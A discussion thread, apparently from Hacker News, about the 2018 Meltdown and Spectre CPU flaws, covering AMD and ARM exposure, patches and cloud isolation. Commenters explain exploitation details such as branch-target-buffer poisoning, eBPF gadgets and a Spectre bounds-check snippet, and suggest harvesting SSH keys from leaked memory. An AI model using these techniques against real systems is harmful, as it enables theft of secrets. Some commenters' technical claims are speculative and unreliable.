Thanks for clarifying Mike, should be interesting to see how this actually pans out.


Not just user memory reads. AMD CPUs won’t speculate loads from userland code directly to kernel memory, ignoring privilege checks (“Meltdown”). But they are still subject to the “Spectre” attack, which can disclose kernel memory by taking advantage of certain code patterns (which normally would be harmless) in kernel code.


But that means the root user or someone with root effective privs or CAP_* to load programs into a kernel interpreter or kernel JIT. If you've given someone permission to do this from a user process you've probably opened up to more mundane issues. I suspect this is why AMD says the issue is near zero, if you've given away the keys to the kernel you're already in trouble.

AMD's ASID blocks the issues for VM guests (and root users on VM guests).


For variant 1, a kernel JIT is definitely helpful, which is why the Project Zero PoC used it, but it's not required.

For variant 2, Project Zero used the eBPF interpreter as a gadget, a fake branch destination, without having to actually create an eBPF program or use the normal userland-facing eBPF APIs at all. And they only chose it as the least "annoying" option (see quote below).

edit: I'm not sure how ASID support would mitigate either of those variants, though there may be something I'm not thinking of. (It would help with variant 3, but that's the variant AMD wasn't vulnerable to in the first place.)

quote:

> At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.


To make it a bit clearer how this works: the Variant 2 exploit poisons the branch target buffer to cause the processor's speculative execution in kernel space to jump to an entirely attacker-controlled destination when it hits a branch that matches the information the attacker has placed into the BTB. The actual retired instructions don't go this way of course - the processor detects the misprediction and goes back to execute the real code path - but the speculatively executed path still leaves evidence behind in the caches.


But somehow you have to get that kernel address in the first place in order to alias it in the BTB. How do you get that without root?


They test how a series of branches are predicted after returning from a hypercall, which lets them basically dump out the state of the BTB. From that, and knowledge of where the branches are in the hypervisor binary (the binaries themselves aren't really a secret, only the relocated load address is) they can figure out the load address of the hypervisor.

See the section "Reading host memory from a KVM guest / Locating the host kernel". It's terribly clever.


But if you use AMD ASID it blocks this as memory mappings for VM guests are in a completely separate address space.

What I was wondering was for local OS user mode to local OS root / kernel mode access; i.e. user to kernel privilege escalation.


It isn't obvious at all how a separate address space would block that method.

What would block it is flushing the branch predictor state when switching privilege levels and/or address spaces.


I've tried reading it and I still find all of this very confusing. Could you ELI5?


You boot up your own copy of Ubuntu LTS-whatever and read the address of it as root.

KASLR is not enabled everywhere, and where it is, there are other attacks to defeat it, which are mentioned in the paper.


I'm not sure I see how to use the Spectre attack on AMD without running in kernel context. What am I missing?


I should clarify I mean user to root privilege escalation.

I totally understand how the breaking out of the javascript sandbox attack works and the fact that IPT won't help with that. With Linux's clone(), you could clone without CLONE_VM and use CLONE_NEWUSER|SYSVMSEM and then unmap everything except the Javascript interpreter / JIT and leave a shared memory map and communicate only via the shared memory map and SYSV semaphores for synchronisation. Obviously this wouldn't be available on other platforms.


By "user to root privilege escalation", I'll assume you mean leaking kernel data without root, since this attack doesn't directly allow escalating privileges at all.

For variant 1, you would need to find some legitimate kernel code, accessible by syscall, that looks at least somewhat similar to the example in the Project Zero blog post:

    if (untrusted_offset_from_caller < arr1->length) {
        unsigned char value = arr1->data[untrusted_offset_from_caller];
        unsigned long index2 = ((value&1)*0x100)+0x200;
        if (index2 < arr2->length) {
            unsigned char value2 = arr2->data[index2];
        }
    }
In practice, you may not be able to find something nice like "((value&1)*0x100)+0x200", but even if it simply used 'value' as an index, you would be able to at least narrow it down to a range. Other code patterns may work too (and potentially be more powerful?), e.g. conditional branches based on 'value'.

For variant 2, see caf's answer to you in another thread.


>>> By "user to root privilege escalation", I'll assume you mean leaking kernel data without root, since this attack doesn't directly allow escalating privileges at all.

The attack allows to read all the memory. Isn't there a way to scan for passwords or ssh keys and turn that into a privilege escalation?


Sure, SSH keys would probably work on a system with SSH enabled; I just wouldn't count that as "directly". (That would include most servers but exclude most Android devices; I have no idea whether there are other escalation methods for Android.)


Direct or indirect is meaningless at this point. The exploit is proven, they just have to determine the "best" memory locations to read to make something "useful" out of it. Then it's bundled together as an exploit kit and it's Armageddon.


> For variant 1, a kernel JIT is definitely helpful, which is why the Project Zero PoC used it, but it's not required.

If I'm understanding the post correctly it says that JIT's not required for Intel CPUs, but is required for AMD.


Their particular exploit for variant 1, which uses eBPF, only worked on AMD with the eBPF JIT, i.e. it did not work with the eBPF interpreter. But there are many other potential avenues to exploit that variant which have nothing to do with BPF. The result does suggest that it may generally be harder to trigger variant 1 on AMD processors (because they doesn't speculate as much?), but harder ≠ impossible.


Ah ok, thanks for clarifying.


Do you need root or comparable privileges to take advantage of BPF? I did not think that was the case. My understanding was that BPF code executes within the kernel.

BPF is employed by the `bpf()` syscall for socket packet filtering, as well as by `seccomp` itself for its syscall filtering. Is this threat vector not available to untrusted processes?


iirc I think that the BPF JIT is disabled by default? Your kernel might be compiled with `CONFIG_BPF_JIT`, but I think the sysctl knob (`bpf_jit_enable`) is set to 0 by default. Also there's a sysctl for unprivileged BPF called `unprivileged_bpf_disabled`. On my system it seems to default to 0.

https://elixir.free-electrons.com/linux/v4.15-rc6/source/ker...


That article links a commit [1] that contradicts this statement

> AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against. The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault.

And Axios [2] that Zdnet quotes gave a comment from AMD:

> "To be clear, the security research team identified three variants targeting speculative execution. The threat and the response to the three variants differ by microprocessor company, and AMD is not susceptible to all three variants. Due to differences in AMD's architecture, we believe there is a near zero risk to AMD processors at this time. We expect the security research to be published later today and will provide further updates at that time."

And a comment from ARM: > Please note that our Cortex-M processors, which are pervasive in low-power, connected IoT devices, are not impacted.

[1] https://git.kernel.org/pub/scm/linux/kernel/git/tip/tip.git/...

[2] https://www.axios.com/how-the-giants-of-tech-are-dealing-wit...


My read is that vulnerable processors generally have to:

1. Have out of order execution

2. Have aggressive speculative memory load / caching behavior

3. Be able to speculatively cache memory not owned by the current process (either kernel or otherwise)

4. Have deterministic ways of triggering a speculative load / read to the same memory location

2 is probably the saving grace in ARM / low power land, given they don't have the power budget to trade speculative loads for performance (in the event they're even out of order in the first place).

Caveat: I'm drinking pretty strong Belgian beer while reading through these papers.


How does that pertain to the vulnerabilities that involve eBPF? My understanding is that eBPF code executes within the kernel, and so would run at the same privilege level.


"Intel suffers a Meltdown" should be an apt headline for tomorrow's headlines.


Another good article: https://www.theregister.co.uk/2018/01/02/intel_cpu_design_fl...

"AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against. The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault."


Google's post is newer and has more insights, the registry article is now outdated.


The register has more details. Worth a read.


the google site has the actual white papers detailing the attacks.


The register has the tweet with actual code for spectre, and more details from the manufacturers and potential fixes. Seriosuly? They're both worth a read.


I think the point is that your quoted section of the reg article is not correct according to the new information from Google.


@lern_too_spel

The AMD engineer could be right if talking about Ryzen, and/or he isn't mentioning user-user and user-kernel boundaries.

AMD isn't affected in nearly the same way as Intel/ARM are: https://twitter.com/ryanshrout/status/948683677244018689


Yeah that's a good one, hope they keep it updated / link to new info / posts as they come out.


Hard to find a good spot for this, but: Thanks to anyone involved! From grasping the magnitude of this vulnerability to coordinating it with all major OS vendors, including Open Source ones that do all of their stuff more or less „in the open“, it was almost a miracle that the flaw was leaked „only“ a few days before the embargo - and we‘ll all have patches to protect our infrastructure just in time.

Interestingly, it also put the LKML developers into an ethical grey zone, as they had to deceive the public the patch was actually fixing something else (they did a good and right thing there IMHO).

Despite all the slight problems along the way, kudos to any of the White Hats dealing with this mess over the last months and handling it super graceful!


Consider how many other of such "gray" patches could already be in the kernel ;)


I'm not that savvy with security so I need a little help understanding this. According to the google security blog:

> Google Chrome

> Some user or customer action needed. More information here (https://support.google.com/faqs/answer/7622138#chrome).

And the "here" link says:

>Google Chrome Browser

>Current stable versions of Chrome include an optional feature called Site Isolation which can be enabled to provide mitigation by isolating websites into separate address spaces. Learn more about Site Isolation and how to take action to enable it.

>Chrome 64, due to be released on January 23, will contain mitigations to protect against exploitation.

>Additional mitigations are planned for future versions of Chrome. Learn more about Chrome's response.

>Desktop (all platforms), Chrome 63:

> Full Site Isolation can be turned on by enabling a flag found at chrome://flags/#enable-site-per-process. > Enterprise policies are available to turn on Site Isolation for all sites, or just those in a specified list. Learn more about Site Isolation by policy.

Does that mean if I don't enable this feature using chrome://flags and tell my grandma to do this complicated procedure I (or she) will be susceptible to getting our passwords stolen?


It probably means if you want mitigations right now, you can flip that flag. Otherwise wait for Chrome to auto-update with new versions that have mitigations enabled by default.


Would I be correct in assuming a browser-level mitigation isn't necessary if you're running a patched OS?


The OS patch stops you reading kernel space from user space trivially (ie. without eBPF in the Project Zero example). You can still cause leakage from the same context, for example, the V8 JIT can read all of the processes memory, without site isolation that can include data on other web pages, passwords, cookies, etc.


Your OS needs patching, as do any programs which handle secret stuff like passwords, cookies, or tokens and interact with the internet (ie. web browsers).


Wasn't there a PoC for a second issue of js reading memory from its own process? Could potentially be an issue (eg reading data from another website)


no


From a recently posted patch set:

Subject: Avoid speculative indirect calls in kernel

Any speculative indirect calls in the kernel can be tricked to execute any kernel code, which may allow side channel attacks that can leak arbitrary kernel data.

So we want to avoid speculative indirect calls in the kernel.

There's a special code sequence called a retpoline that can do indirect calls without speculation. We use a new compiler option -mindirect-branch=thunk-extern (gcc patch will be released separately) to recompile the kernel with this new sequence.

We also patch all the assembler code in the kernel to use the new sequence.


Link?


Text and patch start here: https://lkml.org/lkml/2018/1/3/780

Also, see Linus' response here: https://lkml.org/lkml/2018/1/3/797


Ahh Linus, never change.



"Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at"

Does anyone have any color/details on how this came to be? A major fundamental flaw exists that affects all chips for ~10 years, and multiple independent groups discovered them roughly around the same time this past summer?

My hunch is that someone published some sort of speculative paper / gave a talk ("this flaw could exist in theory") and then everyone was off to the races.

But would be curious if anyone knows the real version?



Jann Horn's results & report pre-date the blog post though. The topic was "ripe", so to speak, so multiple parties investigated it at roughly the same time.


Yeah, the blog post says they knew since June 2017, with that blog post being from July.

> This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh's work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-....


AIUI, Anders Fogh has collaborated with people at TU Graz on various occasions previously: I'd assume they already knew about his work prior to the blog post.


There was a paper "A Javascript Side-Channel Attack on LLC" in 2015 which seem similar to me, maybe it drove some research toward timing/caching mechanism at the CPU level and its exploitation with a 'side channel' attack.


Considering it includes most cpus from the last decade (or even last two), shouldn't they delay it a little bit longer so that not only cloud businesses but also more mainstream companies get the time to deploy patches and tests ?


Azure's response: https://azure.microsoft.com/en-us/blog/securing-azure-custom...

This part is interesting considering the performance concerns:

"The majority of Azure customers should not see a noticeable performance impact with this update. We’ve worked to optimize the CPU and disk I/O path and are not seeing noticeable performance impact after the fix has been applied. A small set of customers may experience some networking performance impact. This can be addressed by turning on Azure Accelerated Networking (Windows, Linux), which is a free capability available to all Azure customers."


Disclosure: I work on Google Cloud.

If you run a multitenant workload on a linux system (say you're a PaaS or even just hosting a bunch of WordPress side by side) you should update your kernel as soon as is reasonable. While VM to VM attacks are patched, I'm sure lots of folks are running untrusted code side by side and need to self patch. This is why our docs point this out for say GKE: we can't be sure you're running single tenant, so we're not promising you there's no work to do. Update your OSes people!


No offence intended as I'm sure it's a bit of a madhouse there right now, but is your statement really correct? I read the Spectre paper quite carefully and it appears to be unpatchable. Although the Meltdown paper is the one that conclusively demonstrated user->kernel and vm->vm reads with a PoC, and Spectre "only" demonstrated user->user reads, the Spectre paper clearly shows that any read type should be possible as long as the right sort of gadgets can be found. There seems no particular reason why cross-VM reads shouldn't be possible using the Spectre techniques and the paper says as much here:

For example, if a processor prevents speculative execution of instructions in user processes from accessing kernel memory, the attack will still work.

and

Kernel mode testing has not been performed, but the combination of address truncation/hashing in the history matching and trainability via jumps to illegal destinations suggest that attacks against kernel mode may be possible. The effect on other kinds of jumps, such as interrupts and interrupt returns, is also unknown

There doesn't seem to be any reason to believe VM to VM attacks are either patched nor patchable.

My question to you, which I realise you may be unable to answer - how much does truly dedicated hardware on GCE cost? No co-tenants at all except maybe Google controlled code. Do you even offer it at all? I wasn't able to find much discussion based on a 10 second search.


Sorry for the confusion.

I have been most focused on people being concerned that a neighboring VM could suddenly be an attacker. You're right that the same kind of thing that affects your JavaScript engine as a user affects say Apache or anything that allows requests from external sources. However, that situation already has a much larger attack surface and people in that space should be updating themselves whenever there's any CVE like this.

My concern was that the Azure announcement made it sound like they've done the work, so nothing is required. That's not strictly true, even though providers have mitigated one set of attacks at the host kernel layer, so I wanted to correct that.


I'm not sure about GCE but in Azure often the largest node size in a particular family (i.e. D15_v2, G5, M128, etc.) is isolated / dedicated to a single customer.


Interesting that they left it this late.


Disclosure: I work on Google Cloud.

Like the AWS reboots, people will notice. So in the interest of the embargo, both Azure and AWS waited to update as late as they felt was safe. Since we do live migrations and host kernel updates all the time, nobody noticed us :).


Someone correct me if I understood this wrong. The way they are exploiting speculative execution is to load values from memory regions which they don't have permission to a cache line, and when the speculation is found to be false, the processor does not undo the write to the cache line?

The question is, how is the speculative write going to the cache in the first place? Only retired instructions should be able to modify cache lines AFAIK. What am I missing?

Edit: Figured it out. The speculatively accessed memory value is used to compute the address of a load from a memory location which the attacker has access to. Once the mis-speculation is detected, the attacker will time accesses to the memory which was speculatively loaded and figure out what the secret key is. Brilliant!


Important to note that at this point they're only reading one bit at a time from kernel memory, but it could probably be changed to read more--exactly how many branches it could compare before the mis-speculation is detected is not discussed, and that could be an area for large speedups in the attack.


Wow, what a find for the Project Zero team. This team and idea can only be described as a success, well done.


"These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running them."

Curious. All other reports I've read state that AMD CPUs are not vulnerable.


See the Twitter thread here: https://twitter.com/nicoleperlroth/status/948678006859591682

(Edit: there are 9 posts total, go to her user page to see them all)

Seems there are two issues. One, called Meltdown, only effects Intel and is REALLY bad, but the kernel page table changes everyone is making fixes it.

The other, dubbed Spectre, is apparently common to the way all processors handle speculative execution and is unfixable without new hardware.

I’d like to know more about that but I haven’t seen anything yet.

Whoever discovered this stuff on Google’s team deserves some sort of computer security Nobel prize.


That's not even close to a thread...

You can see all the tweets here (courtesy of @svenluijten): https://twitter.com/i/moments/948681915485351938.


After reading that thread, I sort of wonder if this is the catalyst for the next tech bust. Prices on the basic building block of the modern tech industry (a server shard) going up 30%, or even more as shared/virtual services must be decommissioned for isolation? Surely it’s an alarmist thing to think and I don’t think it’s likely, but if you asked me yesterday the likeihood of an underlying security vulnerability effecting every processor since 1995 I’d have said probably not.

Major props to the teams working on this... now time for us all to hold onto our pants as we ask for budget increases that will make shareholders demand blood.


would be interesting to look at public companies where server costs going up 20% would kill their profit margins.


I don't think this is likely anywhere.

The only sorts of companies where server costs could increase hugely due to a sudden need for hardware isolation are those where they're running tiny or incredibly bursty workloads. Big companies like Netflix that use tons of cores can just binpack their work all together on the same hardware so their jobs only share hardware with other jobs controlled by the same company. Effectively, cloud providers will start offering sub-clouds into which only your own jobs will be scheduled.

This is actually how cloud tech has worked for many years internally. I worked at Google for a long time and their cluster control system (Borg) had a concept called "allocs" which were basically scheduling sub-domains. You could schedule an alloc to reserve some resources, and then schedule jobs into the alloc which would share those resources. Allocs were often used to avoid performance-related interference from shared jobs, e.g. when a batch job kept hogging the CPU caches and slowing down latency sensitive servers. I suppose these days VMs and containers do a similar job, though I think the Borg approach was nicer and more efficient.

I guess this sort of per-firm isolation will become common and most companies costs won't change a huge amount. The people it'll hit will be small mom-and-pop personal servers, but they're unlikely to care about side channel attacks anyway. So I wouldn't sell stock in cloud providers just yet.


The linked thread suggests that Spectre doesn't have _any_ mitigation.

> The business/economic implications are not clear, since eventually the only way to eradicate the threat posed by Spectre is to swap out hardware.

Is this fully accurate, there's no software mitigation available now?

From [0], the above may be true:

> There is also work to harden software against future exploitation of Spectre, respectively to patch software after exploitation through Spectre .

There is 'work'? No current patch? So Spectre is unpatched?

This point doesn't seem to be being highlighted but appears particularly important.

[0] https://meltdownattack.com/#faq-fix


Yes, from my understanding, Spectre is an architectural-level flaw in the so-called speculative execution unit. In other words, Spectre will only be fixed once Intel, AMD, and ARM redesign the unit and release new processors. Given the timelines of CPU design, this will take 5-10 years at least.

On the positive side, the flaw is very difficult to exploit in a practical setting.


> On the positive side, the flaw is very difficult to exploit in a practical setting.

Is it?

"As a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs"


So is this fixable or not?



There are possible mitigations for cloud providers: 1) pay $x / hour and run on shared machine with possibility of an attack; 2) pay $y / hour (where x < y) and run all your processeses on dedicated machines without anybody else.

Moreover the option 2) already exists for large customers and security sensitive applications (e.g. CIA dedicated cloud built by Amazon).


Amazon instances can be created with the dedicated flag. The host hardware will be dedicated to you, not shared with any other users. It should mitigate the attack.

The flag has a fixed fee in the thousands of dollars and each instance is 10% more expensive.


I didn’t find out there were more than 4 posts until after I made my comment (thus the edit).

Thanks for the handy link.


I can't really see how it would be fixable even with new hardware.

Speculative execution is fundamental to getting decent performance out of a CPU. Without it you should probably divide your performance expectations by 5 at least.

Rolling back all state rather than just user visible state in the CPU is neigh on impossible. When you evict something from the cache, you delete it. Undeleting is hard. There are also a lot of other non-user-visible bits of state in a CPU.


I agree that we'll probably see new attacks in this area for a long time.

That said, the main new ingredient of Spectre seems to be the idea that userspace can poison the branch target buffer to cause speculative execution of arbitrary code in kernel space. That part of the attack should be fairly easy to mitigate with new hardware, by XORing (or hashing) the index into the BTB with a configurable value that depends on the privilege level. So each process has its own "nonce", and they're all different from the kernel's.

Then BTB poisoning won't work unless the attacker knows its own and the other context's nonce. Even if further attacks are found that leak this nonce, they could be mitigated by changing the nonce at regular intervals.


Couldn't you do something like have a separate chunk of "speculative cache" which you only commit to the main cache once the speculatively-executed instructions are retired? Sounds complex, sure - but it seems like that would give you the performance benefits of speculative execution while still being able to roll back (or prevent in the first place) any cache-state side effects when branches were mispredicted. Could also imagine processors start segregating cache by privilege level.

I guess part of the question you're raising is: are there so many different caches, translation buffers, etc. in a modern CPU that keeping 'uncommitted buffers' for the state of all of them would be just as complex as throwing a whole other core in there?


No, that would not be enough. CPUs speculatively execute across multiple branches. Even if you had a separate speculative cache for every code path, you could still build a side-channel from the amount of contention. [1]

[1] https://eprint.iacr.org/2016/613.pdf

> Both hardware thread systems (SMT and TMT) expose contention within the execution core. In SMT, the threads effectively compete in real time for access to functional units, the L1 cache, and speculation resources (such as the BTB). This is similar to the real-time sharing that occurs between separate cores, but includes all levels of the architecture. [...] SMT has been exploited in known attacks (Sections 4.2.1 and 4.3.1)


Possibly - but that's an entirely new processor design. That would take years to get released an adopted.

The scary thing is that you can't fix this in software.


It effectively means wiping the caches, TLBs, BTBs and any other caches and optimisations on any form of context switch, as far as I can see? Which yes will likely require new silicon.


> computer security Nobel prize

While they're not as big of a deal AFAIK, we do have the Pwnie Awards: https://pwnies.com/


We should have an annual vulnerability/amelioration award (the Cerberus?) and give one to those guys.


You can find the details below. They've tried AMD CPUs also.

https://googleprojectzero.blogspot.com/2018/01/reading-privi...


"We reported this issue to Intel, AMD and ARM on 2017-06-01"

What!


You know it's a bad one when Project Zero allows more than its usual 90-day deadline...


"Which systems are affected?" – "All systems." – "Come again?"


From the FAQ on spectreattack.com:

> Q: Am I affected by the bug?

> A: Most certainly, yes.

Scary.


If you're using an in order processor, a Nexus 9 tablet say, then you should be safe.


I wasn't thinking straight last night. Basically all in order application processors use speculative execution.


Even a low-power core like a Cortex-M7 can do some speculative execution through its branch predictor.

Though of course a M7 isn't running VMs, and probably isn't running any kind of attacker-controlled code (scripting included - its there, but rare), so many of the vectors aren't present.


Then front-runs the negotiated timeline anyway, catching projects like Xen off guard (it seems like)[0]. Will be interested to read the postmortem of the entire process from start to finish, and Xen is promising one from their perspective. I'd be especially interested to understand whether public intel was concrete enough to rush this out the door, because it didn't seem like it was, but I probably missed something.

[0]: https://xenbits.xen.org/xsa/advisory-254.html


I reimplemented variant 3 based solely on clues from twitter posts yesterday.

I am by no means a computer security guru - I just did a CPU architecture course at uni and figured I'd cowboy up an implementation. It worked nearly first time, and can read both kernel and userspace pages from userspace by fooling the branch predictor into going down the wrong path, and relying on the permission checks to be slower than the data reads from a virtually addressed cache. It can only access stuff already cached though, so you can't do a full memory dump with it.


speculation was apparently hitting very close to home allowing attackers with resources (think nation states) to start developing their own tooling. at least this early announcement allows people with sensitive data to quickly move to dedicated instances.

edit: well it didn't take a nation state after all: https://twitter.com/brainsmoke/status/948561799875502080 - given that, you can be sure that everybody who counts is frantically launching these on your clouds gathering whatever they can.


How much in advance do the intel managers have to register a stock sell?


The CEO dropped his stock holdings down to the minimum allowed by their board bylaws in December.

https://www.fool.com/investing/2017/12/19/intels-ceo-just-so...


For his sake, I hope longer than 6 months!


You mean without getting whomped for insider trading? I don't think they're allowed to do it in advance at all.


As far as I know they HAVE to register a trade in advance. I.E. three months ahead: "I will sell 600 shares on 15th of December if the share price is above 50". This information is public and other people can use this information before the trade actually happens.


Note that's not a legal requirement. That's just a policy many companies have to lower the risk of insider trading.


It looks like he registered for the trade in October, well after Intel was made aware of the issue.


We won't know until we have the full details. From the linux patches it looked like that AMD x86-64 processors were not affected.

But the sentence you quote adds AMD back into play. Maybe some of its ARM processors? e.g. AMD Opteron A1100?


They weren’t effected by the really bad Intel big names Meltdown. They’re still susceptible to Spectre.


And yet it also says that AMD devices running Android are not vulnerable.

I'd be curious how those two statements should be reconciled.


Not exactly; it says "we are unaware of any successful reproduction of this vulnerability that would allow unauthorized information disclosure on ARM-based Android devices."


Links to descriptions of similar vulnerabilities in AMD and ARM processors would be very welcome.


Here's a list of what google tested:

Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called "Intel Haswell Xeon CPU" in the rest of this document)

AMD FX(tm)-8320 Eight-Core Processor (called "AMD FX CPU" in the rest of this document)

AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called "AMD PRO CPU" in the rest of this document)

An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called "ARM Cortex A57" in the rest of this document)

https://googleprojectzero.blogspot.com/2018/01/reading-privi...


So there's a bit of an unknown if AMD's most recent generation of processor has the Spectre vulnerability?


We know that the scariest attack "meltdown", cannot be reproduced on AMD or ARM chips at all[1]. The second attack "Spectre" is also greatly mitigated due the neural network predicting pathways for the application. Thus it's unlikely/less-likely that you'll be able to access other locations in memory[2]. However, it's definitely possible.

[1] https://meltdownattack.com/meltdown.pdf

[2] https://spectreattack.com/spectre.pdf


ARM advisory [1] does state that Cortex-A75 is vulnerable to variant 3 (Meltdown).

[1] https://developer.arm.com/support/security-update


Has anyone tried the Spectre PoC in the paper on ThreadRipper? I can confirm it works on my i7-7700K.


Sounds like maybe SOME ARM and SOME AMD are implicated, especially since the Android ARM CPUs appear to be fine...


There aren't really any special Android ARM CPUs, maybe they are confident it doesn't really work on Android because it's very difficult to get the timing precision and low-level assembly sequences in Java/ART compiled code. Though I wonder how that squares up with JNI.

I think the key to the statement is in any case that you need to differentiate between what is possible on the processor architecture level when you have full software control, and what is possible on an operating system level, where 3rd party applications are further restricted in various arbitrary ways such as only allowed to use Java, limited access to high resolution timing primitives, etc. that can make practical exploitation impossible, even if the flaw is present.

It's difficult to reason about because it's hard to tell if you can manipulate a JIT runtime into generating the code you need for the exploit to work - and as the JavaScript implementations show, the answer is often "yes".


JIT engines (and compilers) often generate a familiar instruction patterns. Many JIT engines Target specific languages (like JS) and as result have "simpler" optimizers (less time to do this) and possibly more stable instruction patterns. So my money is on somebody fuzzing the required JS code.


You can develop Android applications in C/C++ using the NDK, thus, giving you full software control if needed.



yeah the intel response page is filled with people claiming intel is evil for even mentioning amd

https://news.ycombinator.com/item?id=16064545


To be fair, the Intel post alludes to collaborating with AMD/ARM on mitigating Spectre, but userspace memory leaking is wholly separate from kernel memory leaking (Meltdown, which only affects Intel processors).


It's a developing story, but from the information we have so far, it does look like Intel involving AMD is a disingenuous since AMD processors are not affected by the most serious of the issues.


It's too early to say which is ultimately the most real-world serious.

From the Spectre note (which does affect AMD):

In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.

How quickly are we going to see attacks targeting BTC/ETH wallets, apps etc. on clients and cloud hosted exchanges?


Hardware wallet or bust right now, right? Use a private key that has never touched the internet?


Has Google the best security team in the world? It seems like Google security is in a complete different league. I cannot imagine how this impacts companies handling fiat money or cryptocurrencies in the cloud like Coinbase in AWS.


Project Zero is very well known for things exactly like this. Partially, it's because they are incredibly talented, but there are also talented people in academia and in other security consultancies. The biggest difference with Project Zero is that their primary [0] goal is altruistic: find vulnerabilities, and let people who can fix them know (vs publishing papers, securing paying clients, auctioning zero-days, etc), in the interests of making the internet and computing as a whole a safer place.

[0] Their secondary goals are to protect Google products and services, and to provide excellent PR in line with what we're discussing right here.


Worth noting that in this case, many of the authors are in academia. It wasn't solely a Google project.


I read it as it was an independent discovery by project zero and by academia researchers.


Independent discovery don't happen overnight. Intel must have been aware of these vulnerabilities for some time.

edit: I'm sure everyone involved acted responsibly. I'm just curious as how far apart these independent discoveries were made.

The bug has been around forever, but it must have been discovered relatively recently since it's not fixed in hardware yet.

I've always been baffled by the concept of simultaneous discovery.


The Spectre paper includes this line in the acknowledgements:

> We would like to thank Intel for their professional handling of this issue through communicating a clear timeline and connecting all involved researchers.


So Google people and the Germans were working on the same thing without knowing of each other until Intel connected them?


Graz is in Austria, but considering these things are usually kept quiet quite long: probably yes


Google project zero blog says: We reported this issue to Intel, AMD and ARM on 2017-06-01


We talked about NSA and how people are leaving for greener pastures. Wondered two things:

1) Have any of them ended up in Project Zero or working on stuff like this

2) Wonder if NSA knew about this vulnerability and now someone there in a windowless office is sighing saying to themselves "Welp, another backdoor we can't use".


>their primary [0] goal is altruistic: ... making the internet and computing as a whole a safer place.

Which is, at the same time, highly rational: to secure their entire market.

It's nice to have big corp's incentives aligned with the public good. Too bad it happens so rarely.


Hm that's tricky. These awesome findings didn't exactly provide net value for google, not even on the not so short term (next 10 years?). They've created a large problem for Google! :-)


Yes and no. The cost of some malicious party figuring it out and using it on Google would potentially been far greater than anything this could cost.


How much value would be destroyed if black hats discovered the bug first and people started discovering that information from their Google cloud VMs was getting leaked?

Sure, Google could just patch themselves, but the information to recreate the issue would surely be leaked by a xoogler, since it only takes a single sentence describing the vuln for a competent sec team to recreate it


Discovering a vulnerability is not creating it. A vulnerability exists even if it was not publicly disclosed. There were probably other people already exploiting it.


Imagine the law suit if Google fails to detect this....


Suppose you have transportaion company that owns 80% of the market share for everything transported on the roads. By car, van, truck, semi, everything.

Suppose your company also has a team that inspects public bridges to make sure they don't collapse.

Is it really altruistic, or given your market share is it a cost of business?


Oh, come on. Their only goal is to make Google money. The fact that they do useful work is a nice side effect, but if they didn't improve Google's security and give good PR there's not a chance in Hell Google would keep them around.


I don't know how you would evaluate such a thing as "best security team," but Project Zero certainly attracts a high calibre of security expert. If you're into breaking things, why wouldn't you want to break things with other bright people and the support of a massive corporation?


How about based on how many of the serious issues are found by Google. It has been one after another.


They're definitely world class, but they're also loud about it. Consider that other teams perhaps have a different model. For instance, Microsoft's internal team surely finds lots of clever bugs that never get talked about in Microsoft products.


I assume the NSA finds and quietly stockpiles some very clever vulnerabilities, too.


I can't imagine better marketing for cloud services than making it as clear as you can that the world is a very dangerous place for computers and if you don't have a crack team of hundreds of battle-hardened security engineers then you have no business hooking your computers up to the internet.


The irony here is that a good ol' dedicated hardware web server is far less susceptible to Meltdown or Spectre than Google Cloud, because only your code is running on the CPUs.

I predict tonight's disclosures will lead to an uptick in interest in running websites on dedicated hardware, like we did back at the turn of the century.


> Spectre

Spectre doesn't really care if it is cloud or bare metal. They are equally vulnerable unless disconnected from internet.


To get you with Spectre, the attacker must be able to run code on your CPU.

This affects browsers with Javascript enabled because your Javascript engine runs foreign code on the CPU. The bad guy puts nasty code in a page, you visit the page, the code executes on your machine--boom.

And it affects public cloud web servers because multiple cloud servers (virtual machines) run on one CPU. So some attacker might be able to jump out of their VM and read your VM's memory.

BUT, on a dedicated hardware web server, there shouldn't be any foreign code running--no foreign VMs, and no browser.


There are many dedicated servers that are shared across users or clients and were expected to be isolated.

Any user who has access to a system (developers or support or sysadmin) has the ability to read arbitrary memory. The vulnerability can probably be leveraged to privilege escalation or bypass the isolation.


Spectre doesn't let u do cross VM memory reading, Meltdown does, AFAIK. If you want to read other VMs memory, u need to RUN in those VMs yourself and within the right process.

So cloud instance and bare metal ones are equally vulnerable under Spectre: as long as they can transfer their malicious code to your VMs and runs it. Can't really see how bare metal servers mitigate this problem.


Pretty hard to have a neighbor vm execute Spectre on your same physical server if you have dedicated hardware.

Add in that Spectre specifically is a js bug so in order to be vulnerable your server would need to execute untrusted JavaScript and I think we can assume the threat surface of this specific bug is smaller outside the cloud...


Pretty sure that its not limited to js:

https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9...

Its a technique, not a flaw in js, from my understanding


